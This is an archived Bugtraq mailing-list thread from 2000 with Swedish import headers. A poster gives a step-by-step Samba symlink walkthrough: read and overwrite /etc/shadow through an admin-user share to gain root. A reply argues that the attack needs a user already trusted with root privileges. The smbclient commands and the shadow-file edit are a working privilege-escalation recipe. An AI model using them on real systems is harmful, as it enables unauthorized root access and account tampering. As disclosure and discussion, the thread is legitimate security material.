linux, säkerhet

5860519 2000-12-14 00:17 +0100  /89 rader/ Tozz <tozz@HACKERS4HACKERS.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-14  23:48  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: tozz@HACKERS4HACKERS.ORG
Mottagare: Bugtraq (import) <14223>
Ärende: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
------------------------------------------------------------
From: Tozz <tozz@HACKERS4HACKERS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <002a01c0655a$eae19c10$0100000a@loesje>

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
=================================================================

Requirements:

* Shell access or any other way to create symlinks
* A running samba deamon
* The username and/or password of a user named in the
  admin lists in one or more shares.
* Brains are not required.

By default, Samba (http://www.samba.org) followes symlinks, which can
lead to root promises. Here is an example:

I have a guy that sorts out all my uploads through SMB, he has 'admin'
access
(admin users = username).. This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf

[uploads]
 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Login to the shell, or find some other way to create symlinks
and create a symlink in /home/ftp/incoming
you do something like

ln /etc -s

now type on you're box (local or remote works both):
smbclient file://foobar.com/uploads -U warezmaster
it will ask for a password, enter it and you will get something like

smb\:>

There we go

smb\:>cd etc
smb\:>get shadow
smb\:>exit

[root@embrace /root]
now you downloaded the shadow file on you're localbox
edit it, change you're UID to 0, or remove the password
from the root account (no password required at logon)

login with smbclient again

smbclient file://foobar.com/uploads -U warezmaster
enter the password

and reupload

smb\:>cd etc
smb\:>put shadow
smb\:>exit

that's it, now login to the shell, if you changed you're own uid
you are now root. If you removed the password from root account
just su to it and you wont need a password.

Note:

The 'Follow Symlinks' can be turned off, but it's on by default.


Fix:

Disable Follow Symlinks


Bye,
Tozz (tozz@hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org channel
#axenet).nickname: Tozz or MemoServ me when I'm not online.
(5860519) --------------------------------(Ombruten)
Kommentar i text 5864613 av Jeffrey W. Baker <jwbaker@ACM.ORG>
5864613 2000-12-14 15:23 -0800  /55 rader/ Jeffrey W. Baker <jwbaker@ACM.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-15  21:32  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jwbaker@ACM.ORG
Mottagare: Bugtraq (import) <14234>
Kommentar till text 5860519 av Tozz <tozz@HACKERS4HACKERS.ORG>
Ärende: Re: Symlink attack in (all?) Samba. - Local root walkthrough by
------------------------------------------------------------
 Tozz
From: "Jeffrey W. Baker" <jwbaker@ACM.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.31.0012141519570.224-100000@heat.dci>

On Thu, 14 Dec 2000, Tozz wrote:

> Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
> =================================================================
>
> Requirements:
>
> * Shell access or any other way to create symlinks
> * A running samba deamon
> * The username and/or password of a user named in the
>   admin lists in one or more shares.
> * Brains are not required.

This is really well documented, and comes as no surprise to an
educated Samba user.  In order for your "exploit" to actually work,
the administrator must have granted a person "admin user" privileges,
after having read this in the documentation:

              This  is a list of users who will be granted admin-
              istrative privileges on the share. This means  that
              they  will do all file operations as the super-user
              (root).

              You should use this option very carefully,  as  any
              user  in this list will be able to do anything they
              like on the share,  irrespective  of  file  permis-
              sions.

and this:

              This parameter allows the  Samba  administrator  to
              stop  smbd  from following symbolic links in a par-
              ticular share. Setting this parameter to "No"  pre-
              vents any file or directory that is a symbolic link
              from being followed (the user will get  an  error).
              This  option  is  very  useful  to  stop users from
              adding a symbolic link to /etc/passwd in their home
              directory for instance.  However it will slow file-
              name lookups down slightly.

Well shit, Wally, I guess we had better not give admin privs to
untrusted people.

The bottom line is that to execute this exploit, you must be trusted
by the administrator, and thus you could probably get blanket sudo if
you wanted it anyway.

-jwb
(5864613) --------------------------------(Ombruten)